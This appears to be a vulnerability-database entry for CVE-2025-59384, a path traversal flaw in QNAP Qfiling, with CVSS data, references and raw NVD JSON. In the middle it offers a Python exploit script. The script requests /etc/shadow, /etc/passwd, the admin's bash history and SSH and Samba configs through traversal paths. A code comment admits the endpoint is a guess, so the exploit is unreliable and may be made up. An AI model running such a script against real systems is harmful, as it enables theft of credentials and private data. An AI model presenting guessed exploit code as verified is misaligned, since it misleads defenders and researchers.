CVE-2025-59384

Description

A path traversal vulnerability has been reported to affect Qfiling. The remote attackers can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following version: Qfiling 3.13.1 and later

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:qnap:qfiling:3.13.0:*:*:*:*:*:*:* - VULNERABLE

QNAP Qfiling < 3.13.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-59384 PoC - QNAP Qfiling Path Traversal
# Target: QNAP NAS with Qfiling < 3.13.1

def exploit_qfiling_path_traversal(target_ip, target_port=8080):
    """
    Exploit for CVE-2025-59384: QNAP Qfiling Path Traversal Vulnerability
    This PoC demonstrates reading sensitive files from the NAS system.
    """
    
    # Target URL for Qfiling file download endpoint
    base_url = f"http://{target_ip}:{target_port}"
    
    # Sensitive files to attempt reading
    sensitive_files = [
        "../../etc/passwd",
        "../../etc/shadow",
        "../../home/admin/.bash_history",
        "../../etc/config/smb.conf",
        "../../etc/config/sshd_config"
    ]
    
    for file_path in sensitive_files:
        try:
            # Encode the path traversal sequence
            encoded_path = urllib.parse.quote(file_path)
            
            # Construct the malicious request
            # Adjust the endpoint based on actual Qfiling API
            url = f"{base_url}/cgi-bin/qfiling/download.cgi"
            params = {
                "file": file_path
            }
            
            headers = {
                "User-Agent": "Mozilla/5.0",
                "Accept": "*/*"
            }
            
            # Send the exploit request
            response = requests.get(url, params=params, headers=headers, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] Success! Retrieved: {file_path}")
                print(f"Content:\n{response.text[:500]}")
            else:
                print(f"[-] Failed to retrieve: {file_path} (Status: {response.status_code})")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {file_path}: {str(e)}")

if __name__ == "__main__":
    # Replace with target IP
    target = "192.168.1.100"
    exploit_qfiling_path_traversal(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59384
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59384
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59384/
[4] VulDB https://vuldb.com/cve/CVE-2025-59384
[5] https://www.qnap.com/en/security-advisory/qsa-25-54

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59384", "sourceIdentifier": "[email protected]", "published": "2026-01-02T16:17:00.160", "lastModified": "2026-01-22T18:23:46.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability has been reported to affect Qfiling. The remote attackers can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQfiling 3.13.1 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qfiling:3.13.0:*:*:*:*:*:*:*", "matchCriteriaId": "7804DC69-DABD-46A9-A10A-8842DA30AE91"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-54", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}